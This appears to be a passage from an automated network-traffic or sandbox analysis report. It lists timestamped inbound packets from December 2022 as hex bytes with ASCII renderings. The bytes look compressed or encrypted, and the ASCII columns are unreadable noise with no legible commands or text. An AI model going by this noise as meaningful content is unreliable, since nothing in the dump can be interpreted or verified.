                                                                                                                                                                          2022-12-05 14:13:35 UTC37INData Raw: 58 40 b8 94 bb 18 39 0c 7a 10 31 82 70 0f 5a cb 45 32 c8 bd 95 e7 f3 94 49 95 41 c0 bd ad 13 7a 13 f3 e3 50 75 41 65 f2 df aa 78 7a 53 9a 81 25 6c 63 da 29 df 82 db 07 82 80 98 10 22 c4 e4 37 84 81 b1 01 bf 66 96 e1 6c 73 2f cb 48 6d a5 73 71 e3 be 49 7a 93 47 d8 49 bd f0 44 a0 94 e4 bc f9 46 25 16 27 73 c3 23 cc 22 5d 4e 99 26 e3 f0 6f f1 b1 a9 ef d3 71 f5 97 e6 82 59 a4 3c 69 ee ce a2 67 07 e8 e3 94 34 0d 2b e5 79 32 09 9f 07 67 85 6b f4 b8 a2 4a a4 ba bb 84 e5 49 53 56 51 ff 71 b3 e6 fc 58 e7 33 c7 a5 11 97 56 3a dc f6 a6 13 ac 14 2f 48 21 49 4a 73 09 42 fc d2 56 02 da 25 28 03 98 c7 67 00 c7 17 96 46 68 10 f4 67 78 7d 03 00 2c 50 ee 67 9f e2 42 66 55 8c 32 0d c6 97 56 48 5a 7f ec 72 65 d0 0b 71 bb 04 dd ce 84 19 74 fb a7 bb 1a 3a 1f 35 7c 9b 7d f3 ba
                                                                                                                                                                          Data Ascii: X@9z1pZE2IAzPuAexzS%lc)"7fls/HmsqIzGIDF%'s#"]N&oqY<ig4+y2gkJISVQqX3V:/H!IJsBV%(gFhgx},PgBfU2VHZreqt:5|}
                                                                                                                                                                          2022-12-05 14:13:35 UTC39INData Raw: 1d 6f cc 79 57 68 0b 49 ae 1e f9 3d 11 c1 d4 d2 35 b0 16 b5 cb 81 61 3c f6 9e 58 19 26 a4 8f 0f d3 63 25 67 1c 33 c3 8c 03 66 27 be dc a5 91 ca 5f 93 36 f8 c6 62 6e 29 a4 0c d2 ce ab f7 c7 cd 3c a8 5d 01 4b a6 fa a5 f5 52 9e 22 3e 97 5e 0d 40 a7 f8 39 ec 2f 4c a8 cd 00 a7 d9 26 4c 55 55 50 08 2c 16 6f 84 ad 51 42 cd c2 e9 ec a4 99 eb ee 17 5a d4 9b 0d 28 1a 9f dc d5 e5 69 7d 7e 2e 64 6a 32 77 e5 2b 07 19 ff 56 36 f0 33 5c e0 a6 64 3e bc 66 f5 b2 e0 f7 ba 02 9d 38 32 97 df d7 11 4a ef 3a 2e e9 f3 97 ff 7c b2 fe 37 8f a9 3c 52 52 91 0e 58 85 51 19 19 dd cf db e0 14 35 72 6f b7 a4 a5 3d ef 67 f4 62 f1 be 4a ca 95 d2 e2 36 f4 9a f4 ef ec b5 4e 49 f6 0a 5d 44 e0 70 07 be c1 fb e9 c2 01 b1 45 3b a8 08 68 7b 8e de 34 70 b8 e3 f2 be ee d0 ba c3 43 b6 31 ca 18 ca
                                                                                                                                                                          Data Ascii: oyWhI=5a<X&c%g3f'_6bn)<]KR">^@9/L&LUUP,oQBZ(i}~.dj2w+V63\d>f82J:.|7<RRXQ5ro=gbJ6NI]DpE;h{4pC1
                                                                                                                                                                          2022-12-05 14:13:35 UTC40INData Raw: 59 e3 24 49 7b 8b 88 c8 a5 22 a7 9a d5 ae 48 1f 9f 67 93 28 5c a8 18 b8 e7 2c 3c 57 ba df d2 72 62 fc 31 e0 77 e5 8c 60 71 40 2c 57 70 b8 d7 44 52 dd 6f 35 e6 a5 43 3e 38 81 2b 25 65 03 41 11 c8 3b 8f be a6 9d 04 ad 1a 8c 86 27 68 0c 17 7b 07 ee 65 bf 2b 78 cd de f3 7c a0 9a a5 6a 1e b5 b9 48 3b a8 d0 d9 65 3a a9 b4 4e 03 5e ab 22 9c 8e 88 46 5c 71 69 78 9e 2c 47 38 59 20 85 bc 84 1c 78 77 02 dd d1 c3 e2 0f 2e 1a cb 0e ab 1d 3a 8b 41 84 4a 9b e8 47 1f 5a 7e 9b 01 d3 64 00 f5 1d 70 ca 27 f7 d6 61 7b a8 8d fd 05 04 fb b3 53 b9 7a ae 51 70 79 da f7 2c 39 9d 22 1e a4 1d 27 fc 1b be 8b 4a eb 30 8c 69 d0 78 34 68 f8 56 26 e6 89 2b 82 a4 bd eb 2b 54 5d 54 f6 f6 4a 82 54 e0 50 71 f6 b8 40 cc d9 4e e6 19 19 3d 50 3e 59 ad f9 64 c6 4c 7d 21 8b f2 20 08 cd 5d d4 95
                                                                                                                                                                          Data Ascii: Y$I{"Hg(\,<Wrb1w`q@,WpDRo5C>8+%eA;'h{e+x|jH;e:N^"F\qix,G8Y xw.:AJGZ~dp'a{SzQpy,9"'J0ix4hV&++T]TJTPq@N=P>YdL}! ]
                                                                                                                                                                          2022-12-05 14:13:35 UTC41INData Raw: ed 8b 3a 38 3b 30 60 17 06 55 31 40 92 af d9 81 db 6a 0c a3 c0 10 99 33 98 69 63 ed 2f d9 68 c1 ba 19 1d 3d a6 8a f4 f6 f0 32 4a 13 93 f2 eb 34 17 9b e9 d6 44 7b 83 27 0f 81 46 04 ab 10 94 53 ec 6a 96 e4 7a 00 63 12 d6 ec 51 a7 e5 cc 38 71 05 c5 7d f8 5c 87 d5 b7 90 42 96 dd c7 88 0c 2a 73 5c f0 45 79 4d b4 ed c9 e7 1d 40 b4 82 27 7d ed 96 e5 60 24 49 74 72 7e 90 58 ce fc 92 77 67 01 00 59 e0 8e f9 17 a0 1e c1 1c 25 2b b8 1b bd c3 d8 c3 c4 49 ac 61 10 2f 38 8b ac 34 fb c0 63 b9 5a a5 8b 61 0b e3 de 02 5b 43 9c 5a 8d af 48 98 0f ae 2d 60 eb 51 09 29 10 7f 73 84 f2 8a f5 42 80 8f 95 03 16 a2 b3 0e 15 c8 d9 ee e5 e1 62 85 b3 70 af 73 95 d9 40 d7 a1 86 9a 18 f7 e1 9b b1 02 93 0d 4d d6 76 96 b8 27 76 88 c5 71 c9 12 c2 ea 5a c9 bb 89 2e 45 9b 57 5e 0c 75 ee 85
                                                                                                                                                                          Data Ascii: :8;0`U1@j3ic/h=2J4D{'FSjzcQ8q}\B*s\EyM@'}`$Itr~XwgY%+Ia/84cZa[CZH-`Q)sBbps@Mv'vqZ.EW^u
                                                                                                                                                                          2022-12-05 14:13:35 UTC42INData Raw: da e4 9d ba ad 53 23 4f b2 51 d5 d7 83 29 98 6b 75 e2 0a 1f 14 3f ac ab 41 07 5a 13 98 f7 fd f1 f8 27 67 43 f4 34 75 3b 03 ff 14 a3 1f 60 9f bf 4c f4 6c 96 2f 5b f4 ac cf 05 46 32 cb 1c d6 84 f7 96 39 37 39 c9 d7 6a 17 6d 03 f9 14 1b 9c 29 cb 49 06 54 ba 36 dd 48 72 81 a0 5a b5 4b 4d 83 48 a2 de bd 8e 23 76 bf 3d 8f 29 16 04 47 57 a5 5b 78 2b f5 3f c5 57 e0 2b 9a 9f 9e 8d 96 e8 8a c4 4b 29 2a 2a f7 b8 59 b8 cc 1c 58 86 6b 84 c8 d5 66 f0 db ea 56 50 62 9e 2a a4 96 a9 16 fc 75 8b c0 4e b3 88 b2 ee 7b 26 2e 69 65 5e 19 98 d6 8d f1 8a cf 7e 9a 26 15 98 d9 45 16 4b f7 cf 4a 0a 9e 20 7a 9f 58 89 43 47 2e b2 b4 a7 3c 25 74 92 ef 65 48 83 5e 9b c9 ea 05 85 25 46 46 02 3b 43 b2 13 ca 5d e2 51 30 a8 81 b2 a1 b4 53 2b 33 62 ed fd d4 20 2d 9e 80 2b 99 d7 aa ab c3 95
                                                                                                                                                                          Data Ascii: S#OQ)ku?AZ'gC4u;`Ll/[F2979jm)IT6HrZKMH#v=)GW[x+?W+K)**YXkfVPb*uN{&.ie^~&EKJ zXCG.<%teH^%FF;C]Q0S+3b -+
                                                                                                                                                                          2022-12-05 14:13:35 UTC43INData Raw: a4 93 4d 83 80 02 89 41 29 65 7a f4 74 7e 81 49 78 f4 99 c9 fc 87 65 51 9e 94 67 5b 01 c6 88 6b 7b 93 51 11 81 51 64 c9 10 28 c9 d4 a0 95 fd 51 a5 73 aa 18 ab 17 26 fa b3 50 90 fd e4 15 69 b7 f2 82 c5 1e b6 06 92 56 30 d8 2a 19 ea 2c 1e 5e 1e a1 94 d7 fd b4 85 a9 2a ee 97 07 c5 e9 59 94 91 09 43 66 c7 79 86 fc 8f 15 b5 ac 60 80 0e 62 00 00 09 c2 1a 9c 7f 2a 64 a9 e2 d7 f0 70 8a 13 b2 b0 bf aa 3f a2 13 1e d8 80 5c 60 57 30 30 44 46 95 01 71 c9 aa 60 53 3b fc 95 a1 1a 9c 05 3d 28 16 7b fd 1f cb 5d 71 69 c5 58 f5 be 97 0d 92 4e a2 0d a1 f5 af 7b ba 2a 2f 75 44 62 81 67 07 ab fa 40 d0 ee 13 a4 72 38 49 10 b9 07 2d e1 7f a6 5a eb a4 3b 00 a7 e4 8b d3 c6 0f d3 e9 32 9c f6 05 f3 8f bc 40 b2 68 d2 44 62 43 21 0a 72 de 8a ed 70 84 28 27 02 2f 26 12 de f8 a5 52 3d
                                                                                                                                                                          Data Ascii: MA)ezt~IxeQg[k{QQd(Qs&PiV0*,^*YCfy`b*dp?\`W00DFq`S;=({]qiXN{*/uDbg@r8I-Z;2@hDbC!rp('/&R=
                                                                                                                                                                          2022-12-05 14:13:35 UTC45INData Raw: 44 73 5a 29 51 42 7d 89 a5 36 64 9b e8 10 c3 48 f6 73 56 b3 1c 61 21 b4 74 50 1a e4 f3 14 d1 a4 cd 04 19 c1 d6 d8 00 d0 60 ad d7 35 57 a7 c0 91 d9 4d f1 4a 27 39 01 00 1d c6 c0 8f 86 ff a8 e2 19 c7 23 5b fd a2 02 c3 a1 10 85 55 05 86 e6 72 d4 2c 79 f7 80 a4 bd e6 6c a6 67 bc 59 54 cd 77 32 5f 1a ea dd f7 fa 35 95 e4 82 46 5e 33 13 4c c6 89 80 98 41 e0 78 22 cf 61 a1 64 a0 5d f2 e4 ea d2 07 0d e7 f6 9f dd 36 66 b3 7f f3 65 ec b0 fa 42 f5 11 19 df 04 cc e1 a8 82 d7 12 ab 39 7c a7 ed a5 52 06 a0 10 90 4c 4a 97 0a 5b 62 58 34 8d 84 92 63 ff 2d 96 49 97 ac d6 a2 e3 63 8c 7a 4e e0 7b bb 6e 3d 2d de 40 fd f7 fd 8f 93 74 2a e8 53 f0 da e6 0a a3 fc b6 9b 2e 98 27 d5 e4 c9 f4 bf fe 0a 6b 68 90 2b db 23 25 31 28 d3 08 9b fa 28 00 37 57 f0 2f 14 37 86 e1 78 c5 9d 8d
                                                                                                                                                                          Data Ascii: DsZ)QB}6dHsVa!tP`5WMJ'9#[Ur,ylgYTw2_5F^3LAx"ad]6feB9|RLJ[bX4c-IczN{n=-@t*S.'kh+#%1((7W/7x
                                                                                                                                                                          2022-12-05 14:13:35 UTC46INData Raw: 8b 81 1c 67 eb 53 9b 7a c5 87 fc 20 8f 67 64 e5 be e2 af 54 7b a5 e8 49 64 b4 0a 4c e9 a1 6f f7 20 e0 33 91 95 a7 a3 ae 4e 5e 32 47 71 2f a2 36 94 1a e9 89 3a 5e d4 e4 e1 5e 7b a0 26 06 94 73 5b 22 fd 34 a2 85 fa 99 2e 94 2b ac e7 21 19 bf cd 62 e5 a0 fa 0a b6 17 48 e2 12 2f c7 cb b4 a8 02 1b 31 da b5 e6 64 6f 25 10 29 45 c3 35 3f 7a 5a 2f fd cf 18 4f 81 ed f6 33 ea 43 aa 13 41 29 61 9e 84 b7 b3 88 35 43 a5 a3 3f c1 4f 8a e2 58 18 d3 cf 5a 9f b1 65 8f 7c 1d e2 95 7c 70 cd 12 ff d8 f9 75 89 4f 34 ec 9e 62 a2 b1 0e f3 84 3b bd 57 5c e5 96 5c 3f 65 d5 c8 10 10 4a 32 93 6b 10 b6 f7 40 28 e3 54 54 2a 59 51 0f e0 82 6d 26 7a 98 20 97 b6 56 5c 11 98 63 1b 9a d0 91 85 0d f3 0b 93 d3 bc e2 30 18 d4 33 72 7a 11 c3 87 04 d0 a2 43 13 79 3e 60 48 d3 b2 a4 77 7e 3d 20
                                                                                                                                                                          Data Ascii: gSz gdT{IdLo 3N^2Gq/6:^^{&s["4.+!bH/1do%)E5?zZ/O3CA)a5C?OXZe||puO4b;W\\?eJ2k@(TT*YQm&z V\c03rzCy>`Hw~=
                                                                                                                                                                          2022-12-05 14:13:35 UTC47INData Raw: 82 7d 61 a9 ec 56 df 45 e7 06 2a bb b7 d2 f2 63 e0 07 ea 7b d6 13 9d 96 18 e1 5e fe 4e 48 f5 b1 c1 ab 66 42 9c d4 e4 a5 40 3d f5 30 7e 45 00 78 bc 87 d4 df 3a 9c 7e 31 8d f9 e9 99 cc f3 2b 8f e2 ab 00 a9 75 c2 0e 19 20 32 e8 6c ce 20 6d 04 cf ba af c9 6c 7d 3f 18 d1 37 60 3b 45 59 05 e8 13 1c ab bb 45 f4 48 f9 cc fb f6 da 6b 15 d7 7e 34 e4 5c 82 b6 57 11 c7 a6 48 0e 71 85 64 ae 9c 0e ef 2c 90 8e b4 60 55 bd 27 6c 92 8c f7 22 23 3a be 06 7d ca 05 b5 d2 73 e9 b3 56 cd 0c 74 85 ca a6 97 f4 1a 8a 57 57 df d8 1f 4a e1 4e b0 99 90 81 45 b2 8e 70 67 d6 b9 7a d5 b9 79 8c 28 45 90 6a 05 14 82 1a b2 0a e5 75 55 ba 40 39 21 e7 80 e8 62 6a 70 95 3d b3 db f0 72 f5 f6 cd 2b 66 b3 fa 1f 2a 73 fd 81 31 1d 7d 19 9e d2 02 6a ef 08 c0 d6 1e 0a 8d ec fc 75 04 ad 6e 44 aa 7c
                                                                                                                                                                          Data Ascii: }aVE*c{^NHfB@=0~Ex:~1+u 2l ml}?7`;EYEHk~4\WHqd,`U'l"#:}sVtWWJNEpgzy(EjuU@9!bjp=r+f*s1}junD|
                                                                                                                                                                          2022-12-05 14:13:35 UTC48INData Raw: 71 7f 2b 34 b4 c9 1c c8 58 a6 ec 82 3a 60 50 ec ed 13 7d 4a 17 a4 fd f6 a5 56 c5 60 12 75 43 56 62 e1 ff 9e 04 4c 07 3f 76 15 6e c8 1c 46 0d e9 d5 3f 7b 73 30 d8 4b f3 29 56 c3 bf 3d 85 36 0c 2a 4a aa b2 33 23 5e 34 93 f4 1a 1e 5c 18 50 0b c8 f6 ef 33 28 ab af cd de 37 cb 55 7a f3 f1 68 50 45 b7 e3 b9 74 9b ac f3 8c 35 c3 ee 70 6e 90 cc 38 e5 58 1a 27 4b da 9b 9b c5 84 13 fd 6e 41 80 aa 1b 8b 77 1f 5f d8 83 0a 11 8c 64 ab c0 53 e6 85 fe 47 59 1e 52 62 28 90 61 df 21 a5 fc 03 26 60 24 27 d6 3b 1c 4a 4e b7 4a 81 f3 3c b0 95 9c a7 de 1f 47 a3 67 44 a8 56 52 b2 79 f2 21 bf 66 a1 69 3d 36 e9 f4 63 77 d8 7a 44 fc a8 59 bf fc ab 7d 4e e7 04 df 76 7a 0a ec ac 74 9a 8a d6 8e e5 11 68 45 30 54 1a 23 6f c5 e1 b1 51 73 a4 c3 64 a3 71 03 30 bf 1b 8b fe ac 60 37 67 61
                                                                                                                                                                          Data Ascii: q+4X:`P}JV`uCVbL?vnF?{s0K)V=6*J3#^4\P3(7UzhPEt5pn8X'KnAw_dSGYRb(a!&`$';JNJ<GgDVRy!fi=6cwzDY}NvzthE0T#oQsdq0`7ga
                                                                                                                                                                          2022-12-05 14:13:35 UTC50INData Raw: 21 27 de 7a 35 e2 f8 f1 5b bb 22 08 fa 34 de d5 f0 43 61 f5 29 a3 d8 23 c8 20 bb f6 5f c6 7d a9 51 a3 60 b2 68 63 3a 17 b1 22 81 2e 14 72 4b 28 08 b1 3a 9e 8c 35 d2 e1 bd b8 63 cd fb b9 3d 47 cb 19 b8 85 18 f6 7e e6 ae 8e 72 e5 36 fe 24 7a 8c 61 58 8c 70 66 45 42 c4 1b 84 e0 ac be 6e f0 1b 5c 35 80 92 0d e6 7e 53 5e 9e 10
                                                                                                                                                                          Data Ascii: !'z5["4Ca)# _}Q`hc:".rK(:5c=G~r6$zaXpfEBn\5~S^
                                                                                                                                                                          2022-12-05 14:13:35 UTC50INData Raw: 9c 48 25 1d 2e 3f 95 06 1b 68 9b ee ea 4e 83 e1 e2 c6 91 cc d0 34 28 38 b6 6d 45 60 c8 ac 58 4d 1a 31 ef f3 ef 2c 48 82 9e bb f4 81 e2 3d 9a e4 f9 81 22 e3 07 8f f0 6d 9d 86 88 98 b8 a0 02 31 64 a1 d1 84 73 c4 d5 79 98 73 f1 17 96 46 5c 74 a0 49 7e cd b3 08 c2 e2 c0 5e 59 24 66 61 28 36 a6 81 83 bf 63 55 af 3c 8d 74 f6 8f 35 34 92 03 e6 b4 50 36 a1 37 9f 32 49 c4 05 0a f6 a8 d1 82 9f 5d c0 b9 a6 88 38 8f b7 8c 07 a6 c8 8f 9a 24 2e 2f ba 90 6c e5 9c cd 43 45 94 d4 bc e2 1a d4 65 f6 4f 08 9a 85 ff c3 ae d2 57 e7 37 bb a0 00 d2 98 2f ad 45 6c 08 ff eb 47 80 72 a9 32 0e 77 82 ad 46 ba 64 71 79 94 2c 08 a1 bc bd 37 c7 97 0b 61 08 f0 0a 29 f5 5a 68 c4 ad 0e c2 d0 17 42 2d 0d a6 01 8c 31 75 cc 22 5f 24 52 0e 2c f4 48 33 19 5d 06 25 15 4a c6 95 98 e0 b8 04 8a ee
                                                                                                                                                                          Data Ascii: H%.?hN4(8mE`XM1,H="m1dsysF\tI~^Y$fa(6cU<t54P672I]8$./lCEeOW7/ElGr2wFdqy,7a)ZhB-1u"_$R,H3]%J
                                                                                                                                                                          2022-12-05 14:13:35 UTC51INData Raw: 1e 81 69 82 7e 8a 0d f6 65 87 d4 77 1c 52 73 95 e8 00 2a 73 92 36 6a 45 23 2e 3a ed 82 44 eb 43 7e 46 01 a0 2c 85 c8 1c d9 ce 70 7d b9 8a 06 fe 36 db e9 8e 65 f6 d8 97 d5 a5 a4 c5 46 5e 21 ba fa 8b 89 5e fa 68 31 7c 1e cc cf 32 dd fc 01 d2 e5 c5 56 42 fa 24 ee 62 11 5f f1 c4 9c 2f 9c d4 4b 7a c9 be b6 ff 41 6d d1 66 6f a1 ee 04 67 0f 17 73 7c 84 e2 ce af 3c 6d e9 89 43 64 af 71 1c 4b 7f 0c 61 24 b1 d8 18 0e 5e 52 95 d8 42 71 97 a7 7c e2 36 20 1d 0d 67 da 8f 46 80 b3 7a 29 cd 80 cf bd 34 1c bc 74 2a d0 ee ed 14 fd d3 fc 40 4a 4a d0 56 74 08 34 85 c1 69 1a e0 78 fb 29 f8 56 ff d0 06 91 0e dd 30 20 23 1e e8 9f 3c 31 db c3 54 09 e2 b9 f8 bd 39 ae cf 1c 8b c6 dc bc f9 29 d9 02 87 4a 63 6d ff 77 56 51 93 3a 98 2a 54 da 56 04 8c b9 6f fa 77 e1 3a 45 e5 d3 44 58
                                                                                                                                                                          Data Ascii: i~ewRs*s6jE#.:DC~F,p}6eF^!^h1|2VB$b_/KzAmfogs|<mCdqKa$^RBq|6 gFz)4t*@JJVt4ix)V0 #<1T9)JcmwVQ:*TVow:EDX
                                                                                                                                                                          2022-12-05 14:13:35 UTC52INData Raw: 11 3c 41 24 1b f4 60 1d 73 dd 0e 90 70 dc 2a 35 ce 15 e6 5c 8e f9 ee 00 8a cb 3a 10 9f af 67 36 3a fe 10 31 35 53 66 8d bc 41 4f 34 24 f4 38 30 7d ea 62 aa 4a 60 19 58 16 6d 25 02 91 22 e9 9c 08 c7 d2 4e cd b4 61 65 60 53 f8 58 9a 4b a3 d6 7e 68 b0 dd 34 31 32 81 44 82 b1 06 0a 89 6e 2b d4 b6 46 56 dc b5 96 83 e7 20 a7 8f a7 89 90 3a f3 f2 a6 e5 55 4c d3 36 f7 e8 a4 66 d2 8c 4f 58 04 88 c2 9e 93 42 7f 86 8a 26 c0 4f 2b b3 51 36 68 ac 77 f7 ba 4b d3 ff 7b 60 f0 7c da 72 96 86 d3 c2 39 cb 17 9b 8c 07 15 62 60 20 f1 8b 72 81 e0 d7 04 e6 9f 83 16 b0 35 01 89 ac 05 91 90 8f 85 f6 27 92 18 f0 8d 76 b5 7c 39 64 c9 a3 fd 8d 17 33 e3 92 45 52 4d 31 f6 4b 92 40 e2 6f 1f 44 a9 09 ed a0 41 c0 5b 23 6a d0 6c 89 e2 33 90 a1 b7 97 89 06 75 0e 8d 9f c2 3d fa 64 d4 86 cd
                                                                                                                                                                          Data Ascii: <A$`sp*5\:g6:15SfAO4$80}bJ`Xm%"Nae`SXK~h412Dn+FV :UL6fOXB&O+Q6hwK{`|r9b` r5'v|9d3ERM1K@oDA[#jl3u=d
                                                                                                                                                                          2022-12-05 14:13:35 UTC53INData Raw: 8b 63 ae 31 86 6e a8 7f c2 34 57 88 b2 7f c8 3a e7 24 cd 00 ec 6d 68 70 8b 1c 08 01 16 42 4d b5 2d 55 e4 76 c8 fa e2 cd 0d d2 72 63 77 2f 12 92 b8 91 b5 e7 53 e6 87 e1 79 88 77 2d b0 ac 7b de e7 92 1b 9c ef 0e ac 36 18 78 2e 2d 0c ef 72 fa 0d 50 89 34 70 fb c4 e0 f8 8a e6 a8 96 6d 93 5e a6 42 b9 b4 cb 5c 99 0d 50 aa 1e bf 04 39 86 72 c9 c1 c6 7f 5e 79 d9 50 e6 b0 e7 e2 e8 f3 b1 a7 2e 99 c1 c6 19 20 3a d0 d8 9b f8 c2 83 83 a2 fa 90 56 52 f3 a8 4d 61 07 84 44 11 1f 11 64 61 d2 a5 de 18 c0 40 71 90 3f f9 7b 9b b4 c7 eb e5 6b 96 bd ad 78 96 e6 38 1f c5 64 e5 f4 23 44 47 3c 3f 33 a2 ec 86 2b 29 81 d2 5f ec 3b f6 45 85 61 5d 17 41 7f ea 36 41 d0 a0 46 44 bd 1f 05 43 0b c6 76 89 2a 8d ef ef 9b 57 af a8 a9 e7 e3 75 dc 14 c5 98 5a 7e 9b f4 fc e6 91 d9 fe 85 e5 93
                                                                                                                                                                          Data Ascii: c1n4W:$mhpBM-Uvrcw/Syw-{6x.-rP4pm^B\P9r^yP. :VRMaDda@q?{kx8d#DG<?3+)_;Ea]A6AFDCv*WuZ~
                                                                                                                                                                          2022-12-05 14:13:35 UTC55INData Raw: da 1d ab c3 2c 48 ac 35 c3 dd 01 ff fe 7f 73 c8 74 c9 cb fe 7a 7e 74 5f d4 52 a1 60 1a 8c 2f 9f 94 ce 13 d4 ee 53 07 77 c6 f5 da ab 5a 8e 82 99 32 f2 ac 07 71 73 34 2a 86 13 7a c5 39 3c 1e 90 61 c4 23 a1 9e c5 7e ee 51 2f 69 99 17 45 54 b9 8e 60 5c d7 b6 13 b4 80 1c 4c e2 7b 13 e1 55 0a 2f 03 62 ba 7a c4 43 68 18 cf e6 b4 d8 ca dc 28 61 96 42 3b 0e 69 d5 a2 03 a8 8c f3 4e 11 c4 46 8e 73 ae 4e f9 16 7f 39 16 3c 0e 5a cd a3 77 61 a1 4f 2b 8d b0 8d ea 8c 28 37 82 49 8a 48 f3 37 83 6b df 2f 9e a7 cd a2 50 fd 49 34 8a 80 eb 23 f4 d1 04 b2 d0 43 df 0a e1 1e fa d1 d2 6a 4a eb 9a 7c 5e 68 9c 3c c2 29 c0 99 1b 75 06 c8 e7 1e 4e 9a 53 c2 c6 89 eb 28 9c 01 1b 70 28 39 a5 b4 ff 68 58 b8 f3 f9 67 48 5d ba a3 6f fe f0 c9 cd 90 da 32 be 4e 8d 9f 97 99 40 66 1b 73 4e c5
                                                                                                                                                                          Data Ascii: ,H5stz~t_R`/SwZ2qs4*z9<a#~Q/iET`\L{U/bzCh(aB;iNFsN9<ZwaO+(7IH7k/PI4#CjJ|^h<)uNS(p(9hXgH]o2N@fsN
                                                                                                                                                                          2022-12-05 14:13:35 UTC56INData Raw: 63 04 b3 88 f1 71 4b 37 6a 64 b4 77 07 42 f6 15 5d 9f 5e 3f d9 48 84 12 7b 4d 18 b1 2a 4c 9d d9 35 aa 42 82 b5 e8 15 db 78 a1 8f a4 84 a1 8f d4 3f 6b cd 09 d1 c0 4e f2 8a 7d ee 9e 51 08 fa bf 0e cf a5 20 e1 cb cd 9f 4b b1 63 97 a4 f7 ab a3 f9 b3 87 40 cf 5c b5 db a5 c0 b6 6e 1f c6 80 b1 04 f4 35 c0 c8 aa 06 1e 66 7e 83 6a c9 84 30 eb b4 13 ce 3f 22 0f 35 4d 79 ba ff 9a 33 db 81 f5 ec 5f a1 b6 e4 63 1a 74 f0 49 cf 06 5e e7 06 d8 31 04 16 84 ef a6 5c 3d 5c 56 66 35 a2 cb 4f bf e8 81 d0 d4 23 9a 93 0f 95 27 65 bd f5 f5 54 2a c0 80 18 e9 7f 39 36 9d 33 b1 9b bc a3 5c ac 56 a6 1e 3c ef ad 04 c1 db 34 88 13 18 ae 7f f5 03 98 10 b6 fd 83 c1 b9 0c 25 5e 01 c1 98 d3 25 4a d9 fb cf ce b0 07 43 3c 98 68 f0 09 5d 92 61 09 fd e6 be 7e 19 08 88 c4 8a a4 97 2e 2d 79 8e
                                                                                                                                                                          Data Ascii: cqK7jdwB]^?H{M*L5Bx?kN}Q Kc@\n5f~j0?"5My3_ctI^1\=\Vf5O#'eT*963\V<4%^%JC<h]a~.-y
                                                                                                                                                                          2022-12-05 14:13:35 UTC57INData Raw: 04 36 e3 15 72 9c 6e 9b 7b 48 d9 32 10 7a cb 4d 2c a0 40 9c a8 97 e2 72 ec e8 8b 89 95 20 4a eb f2 21 58 37 fe b7 c6 af c4 21 ba 97 31 fb 41 32 0e 53 bf 7e dd 4c ab 3a ef 24 ea 1a 43 e1 1d 2b ee 77 19 c2 4f 5f 34 81 ad 6c ed 8d bc 28 7c c6 d2 b0 ca bf f8 0e c4 17 77 a3 1f 48 9e c0 7c 83 c2 f8 69 48 da 10 96 31 c7 2e f4 31 6c 1f 3c c0 f2 de fd 44 3b 24 38 bf 92 d5 94 5c 9a 96 27 b3 2c c9 65 60 28 c4 d4 df 16 dd 83 b3 d0 82 a5 fa bb 35 aa 59 74 71 c8 1b b0 43 c0 98 f5 0b de 62 3d 51 3b 4b 49 ac e6 e6 ae 71 4f 35 f9 0a 48 1e f3 83 8f 3e b5 47 e5 ed 10 b7 d1 56 f6 e9 91 07 91 f4 23 b5 6e ce 63 b1 ac 80 6d af 28 d2 4d 2b 6f f1 4b 15 fd e7 46 3d 59 9b bf 04 c5 75 e3 fc 10 25 bc 7c 48 90 35 c6 e5 b9 ed 6b 67 15 c4 7e cb 9e 9d 83 ac 07 b8 1c 88 e6 a3 88 33 f3 d0
                                                                                                                                                                          Data Ascii: 6rn{H2zM,@r J!X7!1A2S~L:$C+wO_4l(|wH|iH1.1l<D;$8\',e`(5YtqCb=Q;KIqO5H>GV#ncm(M+oKF=Yu%|H5kg~3
                                                                                                                                                                          2022-12-05 14:13:35 UTC58INData Raw: b1 d1 86 da f3 75 ce e4 07 95 82 55 ad 6a bc c4 20 f6 82 b2 ed 8e 8f ed f7 21 99 6a 05 c8 ae b7 b0 7f 9f 85 a7 8c 35 fa c6 4a 18 64 2d a1 bb 1f 3c b4 ff 7c 70 9b 30 7f d1 1a cd fb 55 6f 6f 34 61 b1 83 10 9f 15 0a a6 e9 f5 a6 9a e9 f3 fe e2 cb 9c f3 84 1e 1f 77 11 d5 c9 0c 9f 4d 27 34 18 80 49 8b 6a 9e 3f 75 ba a2 0b 49 fa eb 85 c3 ae fd e8 61 24 98 11 2f 33 37 71 a3 89 f2 b2 62 17 a1 c1 f9 5e 8a 0d 3b fb f7 1c c1 61 cf 8b 2f b5 e8 53 f6 d9 92 c2 01 f1 7e 9c cb cb 19 15 9e e2 be 0d 70 75 b1 ea 40 3c df 04 3f cb 93 df 49 2a 43 5c c7 d6 33 05 02 19 7e 6a e9 93 b5 70 a5 6e 23 02 3d b2 3a f9 58 03 bf 44 d8 b6 87 ee 0f 57 5b bc a3 cd 7b e4 73 7d b3 32 48 2c ed 86 51 97 70 4c 73 7b 1b 40 5f 76 93 f9 f6 c3 32 58 40 eb 19 a0 f0 93 18 14 b8 0b cd 1b b5 87 13 1b 08
                                                                                                                                                                          Data Ascii: uUj !j5Jd-<|p0Uoo4awM'4Ij?uIa$/37qb^;a/S~pu@<?I*C\3~jpn#=:XDW[{s}2H,QpLs{@_v2X@
                                                                                                                                                                          2022-12-05 14:13:35 UTC59INData Raw: 98 2b 0d 05 64 0a 01 25 1a fd 02 0d 09 d2 fd 7a 76 7b 80 9d 86 2c b6 25 1a 50 25 37 58 5b 46 71 a8 a1 b9 e1 b6 42 da 1d 4a 56 f8 3a 70 54 09 75 97 ab a6 58 13 b0 16 3f eb 76 2c 8b 4c c2 fa f9 95 57 82 57 1f b4 f5 bf b4 ab 35 15 a3 09 1d 93 f8 25 d6 a7 a3 27 40 39 8b 51 41 91 07 7e 9a a8 9b 95 7d 32 26 db 8e b1 05 d4 2a b8 f7 8a e6 fb dc 28 52 62 de 57 9d 4d 79 14 09 75 84 70 2b 4d 57 59 9a ea d5 27 5b 00 02 79 1d c3 21 57 a6 a0 40 80 90 06 55 db 9f 3d 0a f3 7b 8e f5 c4 c2 0f bb 3a e7 ac f9 b3 71 d9 ce 2c f3 10 a5 1d d6 1f 11 67 2c 09 9e 6a 63 f9 05 3e 9e d4 f8 b0 04 d3 ef 01 50 2e ca 44 da ef 50 db 1d 74 ad 2a 59 7e eb 7c f3 9e 63 48 7b ef f6 ba 85 2e b8 f2 15 95 04 f2 3e 41 29 22 73 96 82 50 a5 f7 54 d1 10 bc 3d 2c d5 69 cc 2f 04 3c dc 0a ab fa d2 89 5d
